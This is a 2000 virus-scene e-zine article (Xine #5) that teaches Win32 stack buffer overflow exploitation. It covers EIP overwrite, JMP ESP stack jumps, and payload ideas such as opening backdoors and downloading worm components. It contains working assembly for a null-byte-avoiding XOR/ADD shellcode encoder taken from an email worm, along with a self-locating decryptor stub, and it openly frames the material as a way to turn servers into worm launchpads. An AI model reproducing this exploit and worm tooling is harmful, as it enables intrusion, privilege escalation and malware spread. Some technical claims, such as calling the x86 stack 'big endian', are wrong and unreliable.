ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
                                             ³ Xine - issue #5 - Phile 116 ³
                                             ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ





 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  A Crash-course in <WIN32> Buffer Overflows
 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  Asmodeus iKX (c) 2000, xine#5 

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Basics : Introduction
 ÄÄÄÄÄÄÄÄÄÄÄÄ
  "Anarchists of the world unite!,
   Arsonists of the world, ignite!"


 "In tranquil silence Peter sits meditating in his pitch black cellar room,
 he's preparing for battle. The battlefield is not to be fought on this
 side of the realm yet it requires full conciousness and awareness. He's a
 highly ranked leader following the arcane "blacks arts". Slowly he
 completes the trancesession and fully embraces his digital form. In
 this realm he's known as Belzath an notorius virus coder responsible
 for handful of highly sophisticated and "sucessful" viruses. Unlike
 the companion by his side he dabbles with the forces of summoning, he
 never actually do battle himself. He's like the ominous spider watching
 silently from the safety of the darkness. His companion is a so called dark-
 master and skilled hacker who unlike Belzath prefers open battle yet conceal-
 ed. Todays course is on how to enslave the minds of unsuspecting enemies. The
 hackers voice echoes in Belzath's head as it floats over enormous distances
 in an instance "To know your enemy is to defeat your enemy", skillfully
 the dark master forms an esquised web of creative power known as assembler.
 "The core of creation is channeled through threads of the one power,
 assembler!",
 In lucid enlightment Belzath recieves the flow of experince the dark master
 so friendly offers him, embraces it and slowly fades into the obscure
 darkness of his study."

 My lesson to you is how to enslave a processor and control it over any
 distance. With the knowledge you obtain from reading this article you will
 be able to transform an email server into a spawning pool for email worms
 or maybe a virus launchpad, DoS minion the power lies in your hands. But
 just because you possess the power doesn't mean you should abuse it, it's
 your own decision and don't blame me if your actions get you in trouble.
 A buffer overflow can also be exploited on a localmahine to obtain
 administrator access. On NT workstations you often have a set of USER
 and ADMINISTRATOR access levels. Some programs need to be installed with
 ADMINISTRATOR access level and hence executes in that access level. If
 you can snatch the EIP (exstended instruction pointer) from that program
 you will also be able to perform actions in the ADMINISTRATOR access level
 , the NT station is yours...
 
 So what is a buffer overflow? Well the word describes the condition pretty good,
 when a program stores an amount of data it could eighter save it in
 precompiled static buffers in .DATA section of the program or it could use
 dynamicaly allocated buffers on the stack (don't confuse this with global
 and virtual memory that are allocated on RAM). Well so what is the stack?
 It's memory BUT its a bit diffrent from ordinary memory. First of all it
 is divided in arrays of DWORDs, that means you can't put a BYTE on stack.
 Well ofcourse you could put for instance 01h on stack but it would be p-
 added to 00000001h. What else should you know about the stack? Well
 first of all it grows from higher memory addresses to lower, sort of from
 roof to floor. When you put stuff on the stack you usually PUSH them on
 the stack and when you fetch them back from the stack you POP them. You
 should also be aware of how the data is stored on stack. Once again the
 name is a give-away, the data is stored on stack like on "a stack" or pile
 of paper. What you latest put on the stack you have to remove first to get
 access to the paper below etc. This is called LIFO which means "Last-in-first
 -out". Note that everything on the stack follows the big endian format which
 means it's reversed. Well it's not really reversed, it's just a matter of
 perspective :> the address 11223344h would look like this on stack
 44332211h, see? The KERNEL32.DLL could be seen as the main chapter of a
 book called "Night of the dead - Windows edition" when your program is
 started it's called from within an API in windows (maybe
 CreateProcessA?) and windows allocates a preset amount of stack which
 is predefined in the PE-header (stack-commit, stack-reserve). ESP holds
 the stack-pointer which points to the top of stack (remember, it grows
 from roof to floor) usually HLL use EBP as a frame-pointer but virus coders
 usally uses it as a delta offset pointer. Anyway when you call an API
 or any other HLL routine for that matter a certain stack-frame will be
 built. It is built in a process called "procedure prologue", basicly
 it saved old EBP redirect EBP to ESP (EBP will be static as ESP is changed)
 I'll tell you more about the appearance of the stack-frame later.
 There is no real "universal rule" of how they should look like
 but most HLL compilers build them in a certain way. Well actually you
 can't avoid putting the return address on the stack-frame and parameters
 etc but usually virus coders doesn't use EBP as a frame-pointer.
 EBP is also known as Exstended BasePointer.
 Well anyway as our "enemies" aren't virus coders who cares? :> Know your
 enemy, remember? Ok so the return address and parameters are on the stack
 what's next? Well the routine hopefully uses some kind of dynamic buffer and
 "cuts" a hole in stack right below the saved EBP (I'll explain the structure
 of the stack-frame later). Lets say the buffer holds 3 DWORDs (3*4) = 12
 bytes, what happens if you sqeeze 24 bytes into the buffer?
 A BUFFER OVERFLOW!!! You write past the buffer boundaries and into restricted
 territory, BUT there are none there to guard the precious data and what is
 also nice is that you can execute code on the stack it makes no diffrence,
 cool! :> If you overflow the buffer correctly you can easily redirect
 the return address and snatch EIP of the process E.G. the execution!
 "To hold infinity in the palm of your hand and the processor in an hour."

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Goin' deeper : Chapter I 
 ÄÄÄÄÄÄÄÄÄÄÄÄ

(Primary objectives : Probing the area)

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Primary objectives : Probing the area
 ÄÄÄÄÄÄÄÄÄÄÄÄ

 So what about that stack-frame I was talking about, what does it look like
 how is it built and what is it good for? Well this is how it is built

 push   00000003h ; PUSH parameter 3 on stack
 push   00000002h ; PUSH parameter 2 on stack
 push   00000001h ; PUSH parameter 1 on stack
 call   function  ; Return address is PUSHed on stack (OFFSET 00400300h)
 ;OFFSET 00400300h 

 ret              ; Return to previous frame (KERNEL32.DLL API)


 function proc local_var:DWORD
 push   ebp       ; PUSH old EBP on stack
 mov    ebp,esp   ; set EBP (base pointer->frame-pointer) so it points
                  ; to stack-pointers current location.

 sub    esp,12d   ; open stack buffer 

; Perform some action

 add    esp,12d   ; close stack buffer

 pop    ebp       ; Restore old EBP from stack (previous frame-pointer)
 ret              ; RETURN to the return address on stack (next paper on
                  ; the pile)
 function endp

 This is how it look like 

 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³    Stack-frame graphical display              ³
 ³ þ ..........                        .......   ³
 ³ þ Parameter3                        4 bytes   ³ OFFSET : 01000020d
 ³ þ Parameter2                        4 bytes   ³ OFFSET : 01000016d
 ³ þ Parameter1                        4 bytes   ³ OFFSET : 01000012d
 ³ þ Return Address                    4 bytes   ³ OFFSET : 01000008d
 ³ þ Old EBP                           4 bytes   ³ OFFSET : 01000004d
 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
 ³ þ Buffer                           12 bytes   ³ OFFSET : 01000000d         
 :                                               :                   
 ú                                               ú                 
 ú                                               ú                  

 You pushed the parameters on stack, called the routine, the call opcode
 puts return address on stack and jumps to the address of function()
 the function() performs a standard HLL "procedure prologue" which consists
 in putting the current EBP on stack and then redirecting it to the
 present ESP (stack-pointer) address. Our function() then digs a
 12 byte hole in the stack for our buffer and later fills it again,
 then restores old EBP from stack and performs a RET operation which
 transfers control to the return address directly on stack (return
 address sometimes AKA instruction address). Now you know how a stack-frame
 looks like and how it is built and why. Btw EBP is used as a reference to
 local variables and parameters.

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Chapter II 
 ÄÄÄÄÄÄÄÄÄÄÄÄ

(Primary objectives : Finding buffer overflow)
(Secondary objectives : Overrun buffer)

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Primary objectives : Finding buffer overflow
 ÄÄÄÄÄÄÄÄÄÄÄÄ

To simplify things I'll use the buffer overflow condition and stack-frame
presented above. As a buffer can hold a specific amount of bytes/characters
you'll have to eighter disassemble the function and "manually" check
how large the buffer or you could find out by the "brute-force" aproach
which means you try by means of trial-and-error how large the buffer is.
Notice that a buffer overflow only accures if the buffer is unchecked. Some
APIs that are unchecked are lstrcpy, lstrcat and all HLL funcitons that
incorperate them or have their own unchecked boundaries such as gets(),
sprintf(), and vsprintf().

Here is a modified version of the procedure function() above. The full
source of this program is called BOAL.ASM and can be found in Xine#5
[Utilities section]

buffer_proc PROC parameter_1:DWORD

;int     3h
;set a break point in the program so you can
;study it in action if you don't want to find buffer overflow by
;means of trial-and-error.

push    ebp
mov     ebp,esp

mov     esi,dword ptr [parameter_1] ; Pointer to memory address with NULL
                                    ; terminated string
sub     esp,12d                     ; Size of buffer <-- Find this with method 
mov     edi,esp                     ; no 1.

stuff_it_in:
cmp     byte ptr [esi],0            ; Check for NULL terminator
je      found_copy_end              ; IF found we're at end of string
cmp     byte ptr [esi],0dh          ; check for Line Feed
je      found_copy_end              ; IF found we're at end of string
cmp     byte ptr [esi],0ah          ; check for Carrier Return
je      found_copy_end              ; IF found we're at end of string
movsb                               ; Keep on movin baby :>
jmp     stuff_it_in                 ; You know what time it is.

found_copy_end:
;int     3h

add     esp,12d                     ; fix stack

pop     ebp                         ; Get old EBP back
ret                                 ; RETURN to saved Instruction pointer

buffer_proc endp


You call the above routine like this

lea     eax,string_i_want_to_copy
push    eax
call    buffer_proc

In C it looks like this

ReturnVal = buffer_proc(mem_address);

Where mem_address is a 32-bit intiger pointing to a memory address containing
your NULL terminated string. You could use the function GetCommandLineA
to faster test diffrent string lenghts. You could also code a brute-forcer
that constantly feeds the buffer_proc() with diffrent lenght strings and
prints the string lenght that causes a access violation fault (requires a
SEH guard). Make sure you fill the buffer with values you will recognize in
HEX value. For instance if you fill it with "x" characters the EIP should
be redirected to the address 78787878h if it's entirely overwritten.

Examples of method no. 2 of finding buffer overflows in the BOAL.ASM file

boal.exe /x

<no result>
1 byte character

...

boal.exe /xxxxxxxxxxxxxxxx

<result = EBP = 78787878h>
16 bytes of character

boal.exe /xxxxxxxxxxxxxxxxxxxx

<result = EBP = 78787878h>
<         EIP = 78787878h>
<Access violation at address 78787878h>
20 bytes of character

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Secondary objectives : Overrun buffer
 ÄÄÄÄÄÄÄÄÄÄÄÄ

The EBP is first overwritten and then the EIP... Ok that makes sence lets
take a look at the stack-frame and how it looks after the overflow

 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³    Stack-frame graphical display              ³
 ³ þ parameter_1           (87654321h) 4 bytes   ³ OFFSET : 01000012d
 ³ þ Return Address [xxxx] (78787878h) 4 bytes   ³ OFFSET : 01000008d
 ³ þ Old EBP        [xxxx] (78787878h) 4 bytes   ³ OFFSET : 01000004d
 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
 ³ þ Buffer [xxxxxxxxxxxx] (78h)*12   12 bytes   ³ OFFSET : 01000000d         
 :                                               :                   
 ú                                               ú                 
 ú                                               ú                  

If the buffer would have been larger we could have fitted some code into
it and redirected the return address to the start of the buffer. But
with 12 bytes we can't do very much :> so we will have to overwrite the
stack beyond the return address with our code. parameter_1 will be
overwritten but in that instance the parameter_1 has already been fetched
from stack, hopefully the routine won't use it anymore before the RET
opcode (operation code). We now encounter the first problem, if the
address we're going to redirect EIP to contains a NULL byte we won't be
able to have code beyond it as it will serve as a NULL terminator for the
string and might even screw up the new return address. So we have hit the
wall, what could be done!? To find the solution for this problem we must
start up the debuger and have a look at the state of the processor registers
at buffer overflow instance. Often ESP points to the start of the buffer
and EDI to the end of the buffer. If you find a register that points
somewhere inside the buffer we could fill the buffer with NOPs (0x90h)
and a jump instruction to the rest of hour code beyond the return address.
ESP can often be used as well, but how can a processor register value be
used!? Well we'll have to be smart, you're smart right? If so you should
have figured out by now how to perform the stack jump. For the less
fortunate I'll explain how ;> Btw of course you're smart, you downloaded
Xine#5 didn't you? Lets pretend ESP holds the address of the start of
the buffer and we have filled the buffer before old EBP and return address
with NOPs and a JMP 10 bytes beyond the return address. We now have to
find a memory address containing no NULL bytes that will perform a
JMP ESP or CALL ESP opcode. If you find a code sequence that does something
like this PUSH ESP;RET you can use it as well. If you don't know what
OS version or service pack that the software run on it could be difficult
to find a DLL that contains those bytes and always loads on same address
on all OS versions (NT 4.0/5.0 and Win9x). The best thing would be if
the program itself used DLLs that had the wanted opcode sequence at an
address without NULL bytes. To find the opcode sequence compile some code
that contains the opcode (JMP ESP for instance) then start your debuger
and check the hex value. NOP for instance has the hex value 90h, to find
a NOP opcode inside a DLL or program you could eighter use your debuger
or a hexeditor and search for the opcode. Softice has the command syntax
s (as in search) type HELP s for more info. Once you have found the
memory address that contains the wanted opcode and no NULL byte you can
use it as new return address in your exploit code. TIME OUT! I hope I
didn't lose you, lets go through it once more... If the stack address
we wanted to redirect the return address to contianed a NULL byte and the
buffer was to small to fit all of our code we have to perform a stack jump.
That means we have to find a processor register that points to a memory
address we can fill with code. Once we found such a register we must find
a memory address inside some DLL of the system that performs a JMP <REG>
or CALL <REG> where <REG> is the register containing the memory address
we wanted to redirect the return address to. Ok so we now have a memory
address that points to a JMP <REG> opcode and contains no NULL bytes
and <REG> points to our code...

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Chapter III  
 ÄÄÄÄÄÄÄÄÄÄÄÄ

(Primary objectives : Defeating bad opcode situation)
(Secondary objectives : Writing the payload)

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Primary objectives : Defeating bad opcode situation
 ÄÄÄÄÄÄÄÄÄÄÄÄ

We have redirected the return address to our code, but our code has to
be intact for it to work... so why wouldn't it be intact? Well during
the buffer overflow it passes through a routine often an API or other
routine. So what? Well as buffer oveflows are common in string handling
routines that keeps copying/moving the string bytes until it hits a
NULL terminator. Some APIs also stop at CR or LF bytes (0dh, 0ah)
If your code contains any NULL bytes which it always does (well almost)
you will have to encrypt it. Best method is to combine XOR and ADD/SUB
encryption. I coded this encryption engine for I-Worm.Arcane which will
find an encryption scheme of XOR and ADD combinations that will produce
encryped code with no NULL/CR/LF characters.

call generate_decryptor

ret

generate_decryptor:

;int     3h

xor     edx,edx
mov     eax,arcane_total_size
add     eax,1d
push    eax
push    edx
call_   arcane_GlobalAllocA 

; Allocate arcane_total_size of bytes + 1 bytes of memory for the
; encrypted body.

mov     dword ptr [ebp+arcane_cryptmem],eax
; save the memory address

call    find_enc_keys
test    eax,eax
je      all_keys_bad

; check if we found an encryption scheme

;int     3h

mov     byte ptr [ebp+xor_val],al
mov     byte ptr [ebp+add_val],bl

; We found a scheme, and we save the values

all_keys_bad:

; eighter we found the keys or we found none :>

ret


find_enc_keys:
xor     eax,eax
restart_search:
lea     esi,[ebp+arcane_project]
mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
cld
rep     movsb

; Copy our code to the allocated memory

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
find_key:
inc     eax
enc_body:
xor     byte ptr [edi], al
inc     edi
loop    enc_body

; XOR encrypt it with the byte value in AL

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size

check_if_valid_enc:
cmp     al,255d
jae     no_more_byte_key
loop_the_enc_body:
cmp     byte ptr [edi],0
je      found_invalid_byte
cmp     byte ptr [edi],0ah
je      found_invalid_byte
cmp     byte ptr [edi],0dh
je      found_invalid_byte
inc     edi
loop    loop_the_enc_body
jmp     found_enc_key

; Check if code is valid or if it contains unwanted bytes

found_invalid_byte:
call    test_adds
test    ebx,ebx
je      restart_search

found_enc_key:
ret

no_more_byte_key:
xor     eax,eax
ret


test_adds:
xor     ebx,ebx

find_add:
mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
inc     ebx
add_body:
add     byte ptr [edi], bl
inc     edi
loop    add_body

; ADD encrypt the body (which already has a XOR layer)

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size

check_if_valid_add:
cmp     bl,255d
jae     no_more_add_byte
loop_the_add_body:
cmp     byte ptr [edi],0
je      found_invalid_add
cmp     byte ptr [edi],0ah
je      found_invalid_add
cmp     byte ptr [edi],0dh
je      found_invalid_add
inc     edi
loop    loop_the_add_body
jmp     found_add_key

; Check if code is valid or if it contains unwanted bytes

found_invalid_add:

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
sub_body:
sub     byte ptr [edi], bl
inc     edi
loop    sub_body
jmp     find_add

; Decrypt the body so we can check another ADD value


found_add_key:
ret

no_more_add_byte:
xor     ebx,ebx
ret

;db "decryptor_start",0

decryptor_start:

xor     eax,eax
xor     ecx,ecx
jmp     get_loc
got_loc:
pop     esi

mov     cx,arcane_total_size
xor_it:
sub     byte ptr [esi],0h
add_val equ $-1
xor     byte ptr [esi],0h
xor_val equ $-1
inc     esi
loop    xor_it

jmp     encrypted_start

get_loc:
call    got_loc
encrypted_start:

decryptor_end:

;db "decryptor ends here",0

decryptor_len   equ $-offset decryptor_start

As the code of the decryptor can't contain any NULL bytes we have to code
it smart as well (as it can't be encrypted). To get offsets which contains
NULL bytes we must make use of the way CALL puts return address on stack
and POP it into a register. Maybe like this

jmp     get_my_offset
got_it:
pop     edi ; EDI = THIS OFFSET
; rest of our decryptor etc
get_my_offset:
call    got_it
;THIS OFFSET
db "encrypted code here",0

We have the encrypted code in memory and have "generated" the decryptor
for the encrypted code. So what is next? the payload... we need some
code to be executed. Let your imagination flourish.

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Secondary objectives : Writing the payload
 ÄÄÄÄÄÄÄÄÄÄÄÄ

Now you have control and your code can execute, what are you waiting for
do your work! Maybe open up a connection to the internet and download
some larger component, this is called an EGG procedure. You could also
open up a backdoor to the internet, or if you're on a localmachine you
could execute some batch file with commands you want to peform in the
higher access level. Or perform them yourself. If you're on an NT
machine (duh) you could start a command prompt (CMD.EXE) which will run
in higher access level as well as all you do in it. I won't explain how
to obtain the API address. Eighter you could fetch them from  KERNEL32.DLL
export directory as you do in win32 viruses. You could also fetch them from
the import table of the program you're exploiting, but sometimes they
don't have all APIs you need. Then you should look for LoadLibrary and
GetProcAddress APIs in the import directory. I leave the rest to you

 ÄÄÄÄÄÄÄÄÄÄÄÄ
 Apendix
 ÄÄÄÄÄÄÄÄÄÄÄÄ

NULL byte = NULL Terminator 0x00h 
CR        = Carrier Return  0x0dh
LF        = Line Feed       0x0ah
Opcode    = Operation code
EIP       = Exstended Instruction Pointer
WORD      = Two bute (2 bytes)
DWORD     = Double word (4 bytes)
RAM       = Random Access Memory (temporary storage [one boot-session])
HLL       = Highlevel language (like C++, Delphi etc)